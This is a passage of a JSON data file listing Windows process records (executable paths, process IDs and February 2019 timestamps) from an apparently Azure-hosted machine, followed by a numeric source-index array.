15:48:32.593000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2328|2019-02-10 15:48:32.613000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x6d4|2019-02-10 15:48:46.753000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x20e4|2019-02-10 15:48:47.493000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1998|2019-02-10 15:49:01.577000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xf54|2019-02-10 15:49:01.603000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x5a8|2019-02-10 15:49:15.733000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1db8|2019-02-10 15:49:15.750000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1fa4|2019-02-10 15:49:29.877000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x604|2019-02-10 15:49:29.903000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x1f24|2019-02-10 15:49:44.043000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x518|2019-02-10 15:49:44.060000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x2170|2019-02-10 15:49:58.200000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x12a8|2019-02-10 15:49:58.227000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x200c|2019-02-10 15:50:12.367000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xf80|2019-02-10 15:50:12.397000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0x1860|2019-02-10 15:50:26.530000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1874|2019-02-10 15:50:26.550000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xccc|2019-02-10 15:50:40.703000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xd7c|2019-02-10 15:50:56.413000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x1634|2019-02-10 15:51:10.573000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1748|2019-02-10 15:51:10.590000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x1898|2019-02-10 15:51:24.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1eb4|2019-02-10 15:51:24.747000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1468|2019-02-10 15:51:38.890000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2200|2019-02-10 15:51:38.953000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x1e8c|2019-02-10 15:51:39.990000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x2348|2019-02-10 15:51:40.003000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x11f0|2019-02-10 15:51:41.033000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1f20|2019-02-10 15:51:41.053000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1480|2019-02-10 15:51:49.140000\",\"c:\\\\windows\\\\system32\\\\services.exe|0x220|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x980|2019-02-09 23:13:35.000000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x1704|2019-02-10 00:14:24.307000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe|0x1520|2019-02-10 00:45:29.713000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe|0x16cc|2019-02-10 00:45:32.377000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe|0xfd4|2019-02-10 00:48:31.607000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x53c|2019-02-10 01:15:12.267000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0xbbc|2019-02-10 01:28:44.710000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x23e8|2019-02-10 02:16:01.357000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0xdf8|2019-02-10 03:16:49.923000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x1c50|2019-02-09 20:28:56.763000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x394|2019-02-10 04:08:34.507000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x105c|2019-02-10 04:17:37.363000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xd44|2019-02-10 05:10:54.303000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x994|2019-02-10 05:18:26.020000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x17e0|2019-02-10 06:19:15.163000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0xa58|2019-02-10 06:28:59.927000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x1564|2019-02-10 08:20:53.497000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x1328|2019-02-10 09:21:42.017000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x1e3c|2019-02-09 22:12:35.813000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x1fa8|2019-02-10 10:22:30.100000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x12d4|2019-02-10 11:23:18.200000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x1f38|2019-02-10 11:28:16.790000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x239c|2019-02-10 12:24:06.663000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x2320|2019-02-10 13:24:54.133000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x1f3c|2019-02-10 14:25:42.670000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe|0x11f0|2019-02-10 15:26:31.390000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0x864|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x8dc|2019-02-09 21:02:56.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x183c|2019-02-09 21:02:56.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0xd74|2019-02-09 23:22:56.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x21c8|2019-02-09 23:22:56.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x6f8|2019-02-09 23:32:56.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1c24|2019-02-09 23:32:56.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1fc0|2019-02-10 00:02:56.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x17a4|2019-02-10 00:02:56.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x10bc|2019-02-10 00:12:56.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1c10|2019-02-10 00:12:56.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xb48|2019-02-10 00:32:56.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x235c|2019-02-10 00:32:56.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xbd0|2019-02-09 21:32:56.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1468|2019-02-09 21:32:56.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x15c8|2019-02-09 20:32:56.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1278|2019-02-09 20:32:56.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xe34|2019-02-09 22:02:56.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xbc|2019-02-09 22:02:56.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x53c|2019-02-09 22:32:56.247000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1834|2019-02-09 22:32:56.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xef4|2019-02-09 22:32:56.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x15f4|2019-02-09 22:32:56.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0xcd8|2019-02-09 20:52:56.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xfd4|2019-02-09 20:52:56.270000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x181c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xbc|2019-02-09 21:09:24.310000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1b28|2019-02-09 21:09:24.320000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1d6c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x15f4|2019-02-09 22:01:13.703000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xda8|2019-02-09 22:01:13.727000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x16e0|2019-02-09 22:01:30.850000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xbb4|2019-02-09 22:01:30.870000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x11f4|2019-02-09 22:01:48.043000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x12d0|2019-02-09 22:01:48.070000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0xce0|2019-02-09 22:02:05.223000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x123c|2019-02-09 23:16:28.153000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x20b0|2019-02-09 23:16:28.163000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xccc|2019-02-09 23:20:15.547000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x14ec|2019-02-09 23:20:15.560000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe|0xda8|2019-02-09 23:55:46.057000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1cfc|2019-02-09 23:55:46.063000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x7fc|2019-02-10 00:22:33.813000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x108c|2019-02-10 00:22:33.823000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x798|2019-02-10 00:26:22.213000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x22e0|2019-02-10 00:26:22.227000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x172c|2019-02-10 01:27:25.173000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1dec|2019-02-10 01:27:25.197000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe2c|2019-02-10 01:31:14.010000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1080|2019-02-10 01:31:14.020000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xb14|2019-02-10 02:31:30.377000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x17ec|2019-02-10 02:31:30.387000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1898|2019-02-10 02:35:21.217000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1058|2019-02-10 02:35:21.230000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xe1c|2019-02-10 03:35:37.273000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x834|2019-02-10 03:35:37.283000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17c4|2019-02-10 03:39:26.323000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x88c|2019-02-10 03:39:26.337000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x2e4|2019-02-10 04:39:41.880000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x108c|2019-02-10 04:39:41.890000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1360|2019-02-10 04:43:32.697000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x19f4|2019-02-10 04:43:32.710000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x19f0|2019-02-10 05:43:48.783000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1570|2019-02-10 05:43:48.793000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17a8|2019-02-10 05:47:40.657000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1058|2019-02-10 05:47:40.667000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe|0x82c|2019-02-10 05:55:52.110000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xd44|2019-02-10 05:55:52.123000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1bfc|2019-02-10 06:47:56.813000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1998|2019-02-10 06:47:56.830000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c10|2019-02-10 06:51:50.063000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1184|2019-02-10 06:51:50.073000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xc6c|2019-02-10 07:52:06.713000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x454|2019-02-10 07:52:06.727000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x65c|2019-02-10 07:56:00.233000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xe1c|2019-02-10 07:56:00.247000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1070|2019-02-10 08:56:16.593000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1ce8|2019-02-10 08:56:16.607000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xb10|2019-02-10 09:00:10.517000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x2260|2019-02-10 09:00:10.533000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1c54|2019-02-09 22:11:59.877000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x181c|2019-02-09 22:11:59.890000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x8c0|2019-02-09 22:16:24.523000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1f60|2019-02-09 22:16:24.537000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x123c|2019-02-10 10:00:27.043000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x518|2019-02-10 10:00:27.057000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xc98|2019-02-10 10:04:18.733000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1cdc|2019-02-10 10:04:18.747000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1484|2019-02-10 11:04:35.127000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xb14|2019-02-10 11:04:35.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x16bc|2019-02-10 11:08:29.550000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1bb4|2019-02-10 11:08:29.573000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe|0x1be4|2019-02-10 11:55:57.567000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xec4|2019-02-10 11:55:57.577000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xd68|2019-02-10 12:08:46.173000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xb64|2019-02-10 12:08:46.183000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1eb4|2019-02-10 12:12:35.877000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xc98|2019-02-10 12:12:35.887000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x6f8|2019-02-10 13:12:52.733000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x84c|2019-02-10 13:12:52.743000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1d6c|2019-02-10 13:16:43.013000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x490|2019-02-10 13:16:43.027000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x16d4|2019-02-10 14:16:59.427000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xa2c|2019-02-10 14:16:59.437000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x65c|2019-02-10 14:20:50.820000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x12fc|2019-02-10 14:20:50.830000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xd78|2019-02-10 15:21:06.890000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x221c|2019-02-10 15:21:06.907000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1238|2019-02-10 15:24:56.040000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1584|2019-02-10 15:24:56.050000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe|0x7c8|1970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x1420|2019-02-09 22:54:40.460000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x20e4|2019-02-09 22:54:40.467000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x9ac|2019-02-09 22:54:40.497000\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\mpam-d3ea18d4.exe|0x1078|2019-02-09 22:55:15.427000\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\90875aaa-9256-468e-a6b3-041d325c6594\\\\mpsigstub.exe|0x1ea8|2019-02-09 22:55:23.273000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x1a44|2019-02-09 22:54:40.470000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x15b8|2019-02-09 22:54:40.523000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x1da8|2019-02-09 22:54:40.560000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x99c|2019-02-09 22:54:40.520000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x974|2019-02-09 22:54:40.527000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x2280|2019-02-09 22:55:10.993000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x205c|2019-02-09 22:55:12.353000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1360|2019-02-09 22:55:12.623000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe|0x11d4|2019-02-09 22:55:12.807000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xaec|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiadap.exe|0x1cc4|2019-02-10 00:46:29.117000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe|0x220c|2019-02-10 03:06:53.157000\",\"c:\\\\windows\\\\system32\\\\wuauclt.exe|0xc14|2019-02-09 22:55:06.653000\",\"c:\\\\windows\\\\softwaredistribution\\\\download\\\\install\\\\am_delta.exe|0x1f24|2019-02-09 22:55:07.023000\",\"c:\\\\windows\\\\system32\\\\mpsigstub.exe|0x1b74|2019-02-09 22:55:07.220000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe|0x1620|2019-02-09 22:55:15.453000\"],\"source_index\":[\"1000\",\"0\",\"100\",\"102\",\"109\",\"122\",\"131\",\"133\",\"141\",\"170\",\"173\",\"174\",\"177\",\"180\",\"182\",\"179\",\"181\",\"183\",\"184\",\"185\",\"186\",\"187\",\"192\",\"193\",\"194\",\"195\",\"196\",\"197\",\"206\",\"207\",\"231\",\"232\",\"302\",\"303\",\"304\",\"305\",\"316\",\"317\",\"341\",\"342\",\"347\",\"348\",\"351\",\"352\",\"353\",\"354\",\"357\",\"358\",\"361\",\"362\",\"370\",\"371\",\"372\",\"373\",\"378\",\"379\",\"380\",\"381\",\"417\",\"418\",\"442\",\"443\",\"488\",\"489\",\"495\",\"496\",\"506\",\"507\",\"508\",\"509\",\"510\",\"511\",\"515\",\"516\",\"522\",\"523\",\"524\",\"525\",\"528\",\"529\",\"533\",\"534\",\"541\",\"542\",\"575\",\"576\",\"600\",\"601\",\"631\",\"632\",\"633\",\"634\",\"636\",\"637\",\"638\",\"639\",\"644\",\"646\",\"645\",\"647\",\"651\",\"652\",\"653\",\"654\",\"659\",\"660\",\"665\",\"666\",\"679\",\"680\",\"725\",\"726\",\"754\",\"755\",\"760\",\"761\",\"765\",\"766\",\"767\",\"768\",\"769\",\"770\",\"775\",\"776\",\"781\",\"782\",\"783\",\"784\",\"786\",\"787\",\"795\",\"796\",\"799\",\"800\",\"826\",\"828\",\"853\",\"854\",\"891\",\"893\",\"892\",\"894\",\"900\",\"901\",\"902\",\"903\",\"906\",\"907\",\"908\",\"909\",\"917\",\"918\",\"919\",\"920\",\"921\",\"922\",\"924\",\"925\",\"942\",\"944\",\"943\",\"945\",\"171\",\"172\",\"175\",\"178\",\"188\",\"189\",\"191\",\"340\",\"360\",\"369\",\"383\",\"498\",\"518\",\"536\",\"649\",\"662\",\"668\",\"7\",\"71\",\"73\",\"763\",\"778\",\"798\",\"80\",\"898\",\"915\",\"931\",\"1001\",\"1\",\"2\",\"1002\",\"110\",\"111\",\"112\",\"113\",\"114\",\"115\",\"116\",\"117\",\"118\",\"119\",\"125\",\"126\",\"138\",\"14\",\"142\",\"143\",\"144\",\"145\",\"146\",\"147\",\"148\",\"149\",\"150\",\"151\",\"152\",\"153\",\"154\",\"155\",\"156\",\"157\",\"158\",\"159\",\"160\",\"161\",\"162\",\"163\",\"164\",\"165\",\"166\",\"167\",\"168\",\"169\",\"198\",\"199\",\"200\",\"201\",\"202\",\"203\",\"204\",\"205\",\"209\",\"210\",\"211\",\"212\",\"213\",\"214\",\"215\",\"216\",\"217\",\"218\",\"219\",\"220\",\"221\",\"222\",\"223\",\"224\",\"225\",\"226\",\"227\",\"228\",\"229\",\"233\",\"234\",\"235\",\"236\",\"237\",\"238\",\"239\",\"240\",\"241\",\"242\",\"243\",\"244\",\"245\",\"246\",\"247\",\"248\",\"249\",\"250\",\"251\",\"252\",\"253\",\"254\",\"255\",\"256\",\"257\",\"258\",\"259\",\"260\",\"261\",\"262\",\"263\",\"264\",\"265\",\"266\",\"267\",\"268\",\"269\",\"270\",\"271\",\"272\",\"273\",\"274\",\"275\",\"276\",\"277\",\"278\",\"279\",\"280\",\"281\",\"282\",\"283\",\"284\",\"285\",\"286\",\"287\",\"288\",\"289\",\"290\",\"291\",\"292\",\"293\",\"294\",\"295\",\"296\",\"297\",\"298\",\"299\",\"300\",\"301\",\"306\",\"307\",\"308\",\"309\",\"310\",\"311\",\"312\",\"313\",\"314\",\"315\",\"318\",\"319\",\"320\",\"321\",\"322\",\"323\",\"324\",\"325\",\"326\",\"327\",\"328\",\"329\",\"330\",\"331\",\"332\",\"333\",\"334\",\"335\",\"336\",\"337\",\"338\",\"17\",\"18\",\"19\",\"20\",\"21\",\"22\",\"23\",\"24\",\"25\",\"26\",\"27\",\"28\",\"29\",\"30\",\"31\",\"32\",\"33\",\"34\",\"35\",\"36\",\"37\",\"38\",\"39\",\"40\",\"41\",\"42\",\"43\",\"44\",\"45\",\"46\",\"47\",\"48\",\"49\",\"50\",\"51\",\"52\",\"53\",\"61\",\"62\",\"63\",\"64\",\"65\",\"66\",\"3\",\"345\",\"355\",\"356\",\"363\",\"368\",\"374\",\"375\",\"376\",\"384\",\"389\",\"390\",\"391\",\"392\",\"393\",\"394\",\"395\",\"396\",\"397\",\"398\",\"399\",\"400\",\"401\",\"402\",\"403\",\"404\",\"405\",\"406\",\"407\",\"408\",\"409\",\"410\",\"411\",\"412\",\"413\",\"414\",\"415\",\"416\",\"419\",\"420\",\"421\",\"422\",\"423\",\"424\",\"425\",\"426\",\"427\",\"428\",\"429\",\"430\",\"431\",\"432\",\"433\",\"434\",\"435\",\"436\",\"437\",\"438\",\"439\",\"440\",\"441\",\"444\",\"445\",\"446\",\"447\",\"448\",\"449\",\"450\",\"451\",\"452\",\"453\",\"454\",\"455\",\"456\",\"457\",\"458\",\"459\",\"460\",\"461\",\"462\",\"463\",\"464\",\"465\",\"466\",\"467\",\"468\",\"469\",\"470\",\"471\",\"472\",\"473\",\"474\",\"475\",\"476\",\"477\",\"478\",\"479\",\"480\",\"481\",\"482\",\"483\",\"484\",\"485\",\"486\",\"487\",\"490\",\"491\",\"493\",\"494\",\"499\",\"500\",\"501\",\"512\",\"513\",\"519\",\"532\",\"537\",\"538\",\"540\",\"543\",\"544\",\"545\",\"546\",\"547\",\"548\",\"549\",\"550\",\"551\",\"552\",\"553\",\"554\",\"555\",\"556\",\"557\",\"558\",\"559\",\"560\",\"561\",\"562\",\"563\",\"564\",\"565\",\"566\",\"567\",\"568\",\"569\",\"570\",\"571\",\"572\",\"573\",\"574\",\"577\",\"578\",\"579\",\"580\",\"581\",\"582\",\"583\",\"584\",\"585\",\"586\",\"587\",\"588\",\"589\",\"590\",\"591\",\"592\",\"593\",\"596\",\"597\",\"598\",\"599\",\"602\",\"603\",\"604\",\"605\",\"606\",\"607\",\"608\",\"609\",\"610\",\"611\",\"612\",\"613\",\"614\",\"615\",\"616\",\"617\",\"618\",\"619\",\"622\",\"623\",\"624\",\"625\",\"626\",\"627\",\"628\",\"629\",\"630\",\"635\",\"650\",\"661\",\"663\",\"664\",\"669\",\"670\",\"671\",\"672\",\"673\",\"674\",\"675\",\"676\",\"677\",\"678\",\"681\",\"682\",\"683\",\"684\",\"685\",\"686\",\"687\",\"688\",\"689\",\"690\",\"691\",\"692\",\"693\",\"694\",\"695\",\"696\",\"697\",\"698\",\"699\",\"700\",\"701\",\"702\",\"703\",\"704\",\"705\",\"706\",\"707\",\"708\",\"709\",\"710\",\"711\",\"712\",\"713\",\"714\",\"715\",\"716\",\"717\",\"718\",\"719\",\"720\",\"721\",\"722\",\"723\",\"724\",\"727\",\"728\",\"729\",\"730\",\"731\",\"732\",\"733\",\"734\",\"735\",\"736\",\"737\",\"738\",\"739\",\"740\",\"741\",\"742\",\"743\",\"744\",\"745\",\"746\",\"747\",\"748\",\"749\",\"750\",\"751\",\"752\",\"753\",\"764\",\"779\",\"785\",\"790\",\"801\",\"802\",\"803\",\"804\",\"805\",\"806\",\"807\",\"808\",\"809\",\"810\",\"811\",\"812\",\"813\",\"814\",\"815\",\"816\",\"817\",\"818\",\"819\",\"820\",\"821\",\"822\",\"823\",\"824\",\"825\",\"827\",\"829\",\"830\",\"831\",\"832\",\"833\",\"834\",\"835\",\"836\",\"837\",\"838\",\"839\",\"840\",\"841\",\"842\",\"843\",\"844\",\"845\",\"846\",\"847\",\"848\",\"849\",\"850\",\"851\",\"852\",\"855\",\"856\",\"857\",\"858\",\"859\",\"860\",\"861\",\"862\",\"863\",\"864\",\"865\",\"866\",\"867\",\"868\